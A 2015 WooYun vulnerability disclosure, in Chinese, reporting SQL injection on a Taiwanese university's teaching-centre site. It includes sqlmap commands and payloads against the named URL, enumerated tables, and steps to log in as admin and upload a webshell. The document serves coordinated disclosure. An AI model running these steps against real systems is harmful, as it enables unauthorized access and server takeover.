当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0128017
漏洞标题:
台湾朝阳科技大学教学中心存在注入漏洞(get webshell)
相关厂商:
台湾朝阳科技大学
漏洞作者:
k3m
提交时间:
2015-07-21 15:59
修复时间:
2015-09-04 17:18
公开时间:
2015-09-04 17:18
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

台湾朝阳科技大学是私立工科大学
本来是学习google hacking的.然后发现了这个网站,觉得有问题就看了一下
很好奇wooyun怎么通知.

详细说明:

存在注入,只是get webshell

漏洞证明:

sqlmap.py -u "http://ctl.cyut.edu.tw/ctlnew/news/new_detail.php?no=936&no2=1" --random-agent --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: no=936 AND 6560=6560&no2=1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: no=936 UNION ALL SELECT CONCAT(0x7162716b71,0x69744949634270505145,0x717a6b7871),NULL,NULL,NULL,NULL#&no2=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: no=936 AND (SELECT * FROM (SELECT(SLEEP(5)))ZuUm)&no2=1
---
[01:32:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[01:32:40] [INFO] fetching database names
[01:32:40] [INFO] the SQL query used returns 2 entries
[01:32:40] [INFO] resumed: information_schema
[01:32:40] [INFO] resumed: ctlnew
available databases [2]:                                                       
[*] ctlnew
[*] information_schema
然后找用户密码
sqlmap.py -u "http://ctl.cyut.edu.tw/ctlnew/news/new_detail.php?no=936&no2=1" --random-agent -D ctlnew --tables
[31 tables]
+----------------------+
| #mysql50#equipment-c |
| #mysql50#newsdata-c  |
| level                |
| user                 |
| active               |
| activedata           |
| association          |
| associationtype      |
| download             |
| downloadtype         |
| equipment            |
| handbook             |
| handbooktype         |
| job                  |
| jobdata              |
| jobtype              |
| law                  |
| link                 |
| manual               |
| member               |
| news                 |
| newsdata             |
| plan                 |
| plandata             |
| plangroup            |
| planperson           |
| profess              |
| question             |
| questiontype         |
| result               |
| resultdata           |
+----------------------+
在user table里面有
admin
acad
找后台在
http://ctl.cyut.edu.tw/robots.txt
We can login at 
http://ctl.cyut.edu.tw/ctlback/login.php
btw,the phpmyadmin has a good alias
啊,又可以输入中文了.好开心
输入之前的用户名和密码
登录之后再去
http://ctl.cyut.edu.tw/accback/
修改旧的公告
上传webshell
在最底下的
98學年度第一學期進修部就學貸款溢貸金額於12/10(星期四)退費 
可以看到附件.点击可直接进去
1.png

修复方案:

过滤吧

版权声明:转载请注明来源 k3m@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-21 17:17

厂商回复:

感謝通報!

最新状态:

暂无